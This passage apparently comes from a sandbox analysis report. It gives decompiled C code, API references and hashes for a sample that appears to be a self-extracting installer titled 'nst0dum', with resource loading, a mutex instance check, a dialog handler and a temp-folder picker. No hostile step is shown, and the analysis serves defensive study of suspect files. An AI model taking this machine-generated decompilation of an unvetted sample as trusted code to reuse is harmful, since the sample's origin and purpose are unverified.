                                                                                                                                                                                                    								 *0x138588 = _t43;
                                                                                                                                                                                                    								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                    									goto L12;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									if(( *0x139a34 & 0x00000080) == 0) {
                                                                                                                                                                                                    										_t64 = 0x524;
                                                                                                                                                                                                    										if(E001344B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                    											goto L12;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L11;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t64 = 0x54b;
                                                                                                                                                                                                    										E001344B9(0, 0x54b, "nst0dum", 0, 0x10, 0);
                                                                                                                                                                                                    										L11:
                                                                                                                                                                                                    										CloseHandle( *0x138588);
                                                                                                                                                                                                    										 *0x139124 = 0x800700b7;
                                                                                                                                                                                                    										goto L33;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t64 = 0x4b1;
                                                                                                                                                                                                    						E001344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						 *0x139124 = 0x80070714;
                                                                                                                                                                                                    						L33:
                                                                                                                                                                                                    						_t23 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00136CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                    			}



















                                                                                                                                                                                                    0x00132cb5
                                                                                                                                                                                                    0x00132cbc
                                                                                                                                                                                                    0x00132cc7
                                                                                                                                                                                                    0x00132cc9
                                                                                                                                                                                                    0x00132cd1
                                                                                                                                                                                                    0x00132cd3
                                                                                                                                                                                                    0x00132cd9
                                                                                                                                                                                                    0x00132ce9
                                                                                                                                                                                                    0x00132cf9
                                                                                                                                                                                                    0x00132d0e
                                                                                                                                                                                                    0x00132d15
                                                                                                                                                                                                    0x00132d1c
                                                                                                                                                                                                    0x00132ef3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132d2d
                                                                                                                                                                                                    0x00132d34
                                                                                                                                                                                                    0x00132d3b
                                                                                                                                                                                                    0x00132d40
                                                                                                                                                                                                    0x00132d48
                                                                                                                                                                                                    0x00132d59
                                                                                                                                                                                                    0x00132d84
                                                                                                                                                                                                    0x00132e1f
                                                                                                                                                                                                    0x00132e1f
                                                                                                                                                                                                    0x00132e2e
                                                                                                                                                                                                    0x00132e41
                                                                                                                                                                                                    0x00132e5a
                                                                                                                                                                                                    0x00132e62
                                                                                                                                                                                                    0x00132e6c
                                                                                                                                                                                                    0x00132e6c
                                                                                                                                                                                                    0x00132e75
                                                                                                                                                                                                    0x00132e77
                                                                                                                                                                                                    0x00132e77
                                                                                                                                                                                                    0x00132e84
                                                                                                                                                                                                    0x00132e8b
                                                                                                                                                                                                    0x00132e94
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132e96
                                                                                                                                                                                                    0x00132e96
                                                                                                                                                                                                    0x00132e9e
                                                                                                                                                                                                    0x00132ea2
                                                                                                                                                                                                    0x00132eba
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132ece
                                                                                                                                                                                                    0x00132ede
                                                                                                                                                                                                    0x00132eed
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132eed
                                                                                                                                                                                                    0x00132eef
                                                                                                                                                                                                    0x00132eef
                                                                                                                                                                                                    0x00132eef
                                                                                                                                                                                                    0x00132eef
                                                                                                                                                                                                    0x00132ea2
                                                                                                                                                                                                    0x00132e86
                                                                                                                                                                                                    0x00132e88
                                                                                                                                                                                                    0x00132e88
                                                                                                                                                                                                    0x00132e43
                                                                                                                                                                                                    0x00132e48
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132e48
                                                                                                                                                                                                    0x00132e30
                                                                                                                                                                                                    0x00132e30
                                                                                                                                                                                                    0x00132ef8
                                                                                                                                                                                                    0x00132f01
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132f01
                                                                                                                                                                                                    0x00132d8a
                                                                                                                                                                                                    0x00132d8f
                                                                                                                                                                                                    0x00132da1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132da3
                                                                                                                                                                                                    0x00132dae
                                                                                                                                                                                                    0x00132db4
                                                                                                                                                                                                    0x00132dbb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132dca
                                                                                                                                                                                                    0x00132dd3
                                                                                                                                                                                                    0x00132df5
                                                                                                                                                                                                    0x00132e02
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132dd5
                                                                                                                                                                                                    0x00132dde
                                                                                                                                                                                                    0x00132de3
                                                                                                                                                                                                    0x00132e04
                                                                                                                                                                                                    0x00132e0a
                                                                                                                                                                                                    0x00132e10
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00132e10
                                                                                                                                                                                                    0x00132dd3
                                                                                                                                                                                                    0x00132dbb
                                                                                                                                                                                                    0x00132da1
                                                                                                                                                                                                    0x00132d5b
                                                                                                                                                                                                    0x00132d5b
                                                                                                                                                                                                    0x00132d5d
                                                                                                                                                                                                    0x00132d69
                                                                                                                                                                                                    0x00132d6e
                                                                                                                                                                                                    0x00132f06
                                                                                                                                                                                                    0x00132f06
                                                                                                                                                                                                    0x00132f06
                                                                                                                                                                                                    0x00132d59
                                                                                                                                                                                                    0x00132f18

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • memset.MSVCRT ref: 00132CD9
                                                                                                                                                                                                    • memset.MSVCRT ref: 00132CE9
                                                                                                                                                                                                    • memset.MSVCRT ref: 00132CF9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346A0
                                                                                                                                                                                                      • Part of subcall function 0013468F: SizeofResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346A9
                                                                                                                                                                                                      • Part of subcall function 0013468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001346C3
                                                                                                                                                                                                      • Part of subcall function 0013468F: LoadResource.KERNEL32(00000000,00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346CC
                                                                                                                                                                                                      • Part of subcall function 0013468F: LockResource.KERNEL32(00000000,?,00132D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001346D3
                                                                                                                                                                                                      • Part of subcall function 0013468F: memcpy_s.MSVCRT ref: 001346E5
                                                                                                                                                                                                      • Part of subcall function 0013468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001346EF
                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00132D34
                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00132D40
                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00132DAE
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00132DBD
                                                                                                                                                                                                    • CloseHandle.KERNEL32(nst0dum,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00132E0A
                                                                                                                                                                                                      • Part of subcall function 001344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00134518
                                                                                                                                                                                                      • Part of subcall function 001344B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00134554
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                    • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$nst0dum
                                                                                                                                                                                                    • API String ID: 1002816675-1021407552
                                                                                                                                                                                                    • Opcode ID: a4e97fc213d98cf3a7886b8db61e20f0658d898298e37e4c345fb28cebda946e
                                                                                                                                                                                                    • Instruction ID: 6b816b3b7bbbaf98cbc21733061e90829ecdf0be7549803c6975854c29237946
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a4e97fc213d98cf3a7886b8db61e20f0658d898298e37e4c345fb28cebda946e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E51F3B0340301ABE724BB349D4BB7B36ADEB55710F144039F985E69E1DBF88C81DA21
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                    			E001334F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				void* _t12;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				void* _t17;
                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                    				void* _t25;
                                                                                                                                                                                                    				struct HWND__* _t35;
                                                                                                                                                                                                    				struct HWND__* _t38;
                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t9 = _a8 - 0x10;
                                                                                                                                                                                                    				if(_t9 == 0) {
                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					 *0x1391d8 = 1;
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					_push(_a4);
                                                                                                                                                                                                    					L21:
                                                                                                                                                                                                    					EndDialog();
                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(1);
                                                                                                                                                                                                    				_pop(1);
                                                                                                                                                                                                    				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                    				if(_t12 == 0) {
                                                                                                                                                                                                    					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                    					if(_a12 != 0x1b) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t13 = _t12 - 0xe;
                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                    					_t35 = _a4;
                                                                                                                                                                                                    					 *0x138584 = _t35;
                                                                                                                                                                                                    					E001343D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                    					__eflags =  *0x138184; // 0x1
                                                                                                                                                                                                    					if(__eflags != 0) {
                                                                                                                                                                                                    						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                    						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetWindowTextA(_t35, "nst0dum");
                                                                                                                                                                                                    					_t17 = CreateThread(0, 0, E00134FE0, 0, 0, 0x138798);
                                                                                                                                                                                                    					 *0x13879c = _t17;
                                                                                                                                                                                                    					__eflags = _t17;
                                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						E001344B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t35);
                                                                                                                                                                                                    						goto L21;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t23 = _t13 - 1;
                                                                                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                                                                                    					__eflags = _a12 - 2;
                                                                                                                                                                                                    					if(_a12 != 2) {
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					ResetEvent( *0x13858c);
                                                                                                                                                                                                    					_t38 =  *0x138584; // 0x0
                                                                                                                                                                                                    					_t25 = E001344B9(_t38, 0x4b2, 0x131140, 0, 0x20, 4);
                                                                                                                                                                                                    					__eflags = _t25 - 6;
                                                                                                                                                                                                    					if(_t25 == 6) {
                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                    						 *0x1391d8 = 1;
                                                                                                                                                                                                    						SetEvent( *0x13858c);
                                                                                                                                                                                                    						_t39 =  *0x13879c; // 0x0
                                                                                                                                                                                                    						E00133680(_t39);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					__eflags = _t25 - 1;
                                                                                                                                                                                                    					if(_t25 == 1) {
                                                                                                                                                                                                    						goto L11;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					SetEvent( *0x13858c);
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t23 == 0xe90) {
                                                                                                                                                                                                    					TerminateThread( *0x13879c, 0);
                                                                                                                                                                                                    					EndDialog(_a4, _a12);
                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}












                                                                                                                                                                                                    0x001334fb
                                                                                                                                                                                                    0x001334fe
                                                                                                                                                                                                    0x00133665
                                                                                                                                                                                                    0x00133666
                                                                                                                                                                                                    0x00133666
                                                                                                                                                                                                    0x00133668
                                                                                                                                                                                                    0x0013366e
                                                                                                                                                                                                    0x0013366e
                                                                                                                                                                                                    0x00133671
                                                                                                                                                                                                    0x00133671
                                                                                                                                                                                                    0x00133677
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133677
                                                                                                                                                                                                    0x00133504
                                                                                                                                                                                                    0x00133506
                                                                                                                                                                                                    0x00133507
                                                                                                                                                                                                    0x0013350c
                                                                                                                                                                                                    0x0013365b
                                                                                                                                                                                                    0x0013365f
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133661
                                                                                                                                                                                                    0x00133512
                                                                                                                                                                                                    0x00133515
                                                                                                                                                                                                    0x001335be
                                                                                                                                                                                                    0x001335c1
                                                                                                                                                                                                    0x001335d1
                                                                                                                                                                                                    0x001335d8
                                                                                                                                                                                                    0x001335de
                                                                                                                                                                                                    0x001335f8
                                                                                                                                                                                                    0x00133617
                                                                                                                                                                                                    0x00133617
                                                                                                                                                                                                    0x00133623
                                                                                                                                                                                                    0x00133637
                                                                                                                                                                                                    0x0013363d
                                                                                                                                                                                                    0x00133642
                                                                                                                                                                                                    0x00133644
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133646
                                                                                                                                                                                                    0x00133652
                                                                                                                                                                                                    0x00133657
                                                                                                                                                                                                    0x00133658
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133658
                                                                                                                                                                                                    0x00133644
                                                                                                                                                                                                    0x0013351b
                                                                                                                                                                                                    0x0013351d
                                                                                                                                                                                                    0x0013354f
                                                                                                                                                                                                    0x00133553
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013355f
                                                                                                                                                                                                    0x00133565
                                                                                                                                                                                                    0x0013357c
                                                                                                                                                                                                    0x00133581
                                                                                                                                                                                                    0x00133584
                                                                                                                                                                                                    0x0013359b
                                                                                                                                                                                                    0x001335a1
                                                                                                                                                                                                    0x001335a7
                                                                                                                                                                                                    0x001335ad
                                                                                                                                                                                                    0x001335b3
                                                                                                                                                                                                    0x001335b8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001335b8
                                                                                                                                                                                                    0x00133586
                                                                                                                                                                                                    0x00133588
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133590
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133590
                                                                                                                                                                                                    0x00133524
                                                                                                                                                                                                    0x00133535
                                                                                                                                                                                                    0x00133541
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00133549
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 00133535
                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00133541
                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 0013355F
                                                                                                                                                                                                    • SetEvent.KERNEL32(00131140,00000000,00000020,00000004), ref: 00133590
                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 001335C7
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 001335F1
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 001335F8
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00133610
                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00133617
                                                                                                                                                                                                    • SetWindowTextA.USER32(?,nst0dum), ref: 00133623
                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00133637
                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00133671
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000002.00000002.382982435.0000000000131000.00000020.00000001.01000000.00000005.sdmp, Offset: 00130000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000002.00000002.382948805.0000000000130000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.382996409.0000000000138000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000002.00000002.383006751.000000000013C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_130000_plct23La85.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                    • String ID: nst0dum
                                                                                                                                                                                                    • API String ID: 2406144884-432003757
                                                                                                                                                                                                    • Opcode ID: 926bde92cdbd77b24012c2a2dee21a1b3042268cbda6f56a88a6c7674ba16965
                                                                                                                                                                                                    • Instruction ID: 033fed18e00d416c1a7099813a92c50b4c1fd031e6b1be026c217d791876cfe7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 926bde92cdbd77b24012c2a2dee21a1b3042268cbda6f56a88a6c7674ba16965
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9031E4B0240300BFD7215F25EC4EE2B3F69EB85B11F544529F66295AB0CB718B80DB59
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                    			E00134224(char __ecx) {
                                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                    				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                    				char* _v28;
                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                    				char _v48;
                                                                                                                                                                                                    				char _v52;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                    				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                    				char _t42;
                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                    				char* _t61;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				char* _t65;
                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                    				char _t67;
                                                                                                                                                                                                    				void* _t71;
                                                                                                                                                                                                    				char _t76;
                                                                                                                                                                                                    				intOrPtr _t85;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t67 = __ecx;
                                                                                                                                                                                                    				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                    				if(_t66 == 0) {
                                                                                                                                                                                                    					_t63 = 0x4c2;
                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                    					E001344B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                    				_v12 = _t26;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					L20:
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t63 = 0x4c1;
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                    				_v20 = _t28;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                    				_v16 = _t29;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t76 =  *0x1388c0; // 0x0
                                                                                                                                                                                                    				if(_t76 != 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					 *0x1387a0 = 0;
                                                                                                                                                                                                    					_v52 = _t67;
                                                                                                                                                                                                    					_v48 = 0;
                                                                                                                                                                                                    					_v44 = 0;
                                                                                                                                                                                                    					_v40 = 0x138598;
                                                                                                                                                                                                    					_v36 = 1;
                                                                                                                                                                                                    					_v32 = E00134200;
                                                                                                                                                                                                    					_v28 = 0x1388c0;
                                                                                                                                                                                                    					 *0x13a288( &_v52);
                                                                                                                                                                                                    					_t32 =  *_v12();
                                                                                                                                                                                                    					if(_t71 != _t71) {
                                                                                                                                                                                                    						asm("int 0x29");
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_v12 = _t32;
                                                                                                                                                                                                    					if(_t32 != 0) {
                                                                                                                                                                                                    						 *0x13a288(_t32, 0x1388c0);
                                                                                                                                                                                                    						 *_v16();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if( *0x1388c0 != 0) {
                                                                                                                                                                                                    							E00131680(0x1387a0, 0x104, 0x1388c0);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						 *0x13a288(_v12);
                                                                                                                                                                                                    						 *_v20();
                                                                                                                                                                                                    						if(_t71 != _t71) {
                                                                                                                                                                                                    							asm("int 0x29");
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					FreeLibrary(_t66);
                                                                                                                                                                                                    					_t85 =  *0x1387a0; // 0x0
                                                                                                                                                                                                    					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					GetTempPathA(0x104, 0x1388c0);
                                                                                                                                                                                                    					_t61 = 0x1388c0;
                                                                                                                                                                                                    					_t4 =  &(_t61[1]); // 0x1388c1
                                                                                                                                                                                                    					_t65 = _t4;
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						_t42 =  *_t61;
                                                                                                                                                                                                    						_t61 =  &(_t61[1]);
                                                                                                                                                                                                    					} while (_t42 != 0);
                                                                                                                                                                                                    					_t5 = _t61 - _t65 + 0x1388c0; // 0x271181
                                                                                                                                                                                                    					_t44 = CharPrevA(0x1388c0, _t5);
                                                                                                                                                                                                    					_v8 = _t44;
                                                                                                                                                                                                    					if( *_t44 == 0x5c &&  *(CharPrevA(0x1388c0, _t44)) != 0x3a) {
                                                                                                                                                                                                    						 *_v8 = 0;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




























                                                                                                                                                                                                    0x00134234
                                                                                                                                                                                                    0x0013423c
                                                                                                                                                                                                    0x00134240
                                                                                                                                                                                                    0x001343b2
                                                                                                                                                                                                    0x001343b7
                                                                                                                                                                                                    0x001343c0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001343c5
                                                                                                                                                                                                    0x0013424c
                                                                                                                                                                                                    0x00134252
                                                                                                                                                                                                    0x00134257
                                                                                                                                                                                                    0x001343a4
                                                                                                                                                                                                    0x001343a5
                                                                                                                                                                                                    0x001343ab
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001343ab
                                                                                                                                                                                                    0x00134263
                                                                                                                                                                                                    0x00134269
                                                                                                                                                                                                    0x0013426e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013427a
                                                                                                                                                                                                    0x00134280
                                                                                                                                                                                                    0x00134285
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0013428d
                                                                                                                                                                                                    0x00134293
                                                                                                                                                                                                    0x001342e6
                                                                                                                                                                                                    0x001342e9
                                                                                                                                                                                                    0x001342ef
                                                                                                                                                                                                    0x001342f4
                                                                                                                                                                                                    0x001342f7
                                                                                                                                                                                                    0x00134300
                                                                                                                                                                                                    0x00134307
                                                                                                                                                                                                    0x0013430e
                                                                                                                                                                                                    0x00134315
                                                                                                                                                                                                    0x0013431c
                                                                                                                                                                                                    0x00134322
                                                                                                                                                                                                    0x00134326
                                                                                                                                                                                                    0x0013432d
                                                                                                                                                                                                    0x0013432d
                                                                                                                                                                                                    0x0013432f
                                                                                                                                                                                                    0x00134334
                                                                                                                                                                                                    0x00134343
                                                                                                                                                                                                    0x00134349
                                                                                                                                                                                                    0x0013434d
                                                                                                                                                                                                    0x00134354
                                                                                                                                                                                                    0x00134354
                                                                                                                                                                                                    0x0013435d
                                                                                                                                                                                                    0x0013436e
                                                                                                                                                                                                    0x0013436e
                                                                                                                                                                                                    0x0013437d
                                                                                                                                                                                                    0x00134383
                                                                                                                                                                                                    0x00134387
                                                                                                                                                                                                    0x0013438e
                                                                                                                                                                                                    0x0013438e
                                                                                                                                                                                                    0x00134387
                                                                                                                                                                                                    0x00134391
                                                                                                                                                                                                    0x00134399
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00134295
                                                                                                                                                                                                    0x0013429f
                                                                                                                                                                                                    0x001342a5
                                                                                                                                                                                                    0x001342aa
                                                                                                                                                                                                    0x001342aa
                                                                                                                                                                                                    0x001342ad
                                                                                                                                                                                                    0x001342ad
                                                                                                                                                                                                    0x001342af
                                                                                                                                                                                                    0x001342b0
                                                                                                                                                                                                    0x001342b6
                                                                                                                                                                                                    0x001342c2
                                                                                                                                                                                                    0x001342c8
                                                                                                                                                                                                    0x001342ce
                                                                                                                                                                                                    0x001342e4
                                                                                                                                                                                                    0x001342e4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001342ce

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00134236
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0013424C
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00134263
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0013427A
                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,001388C0,?,00000001), ref: 0013429F
                                                                                                                                                                                                    • CharPrevA.USER32(001388C0,00271181,?,00000001), ref: 001342C2
                                                                                                                                                                                                    • CharPrevA.USER32(001388C0,00000000,?,00000001), ref: 001342D6
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00134391
                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 001343A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
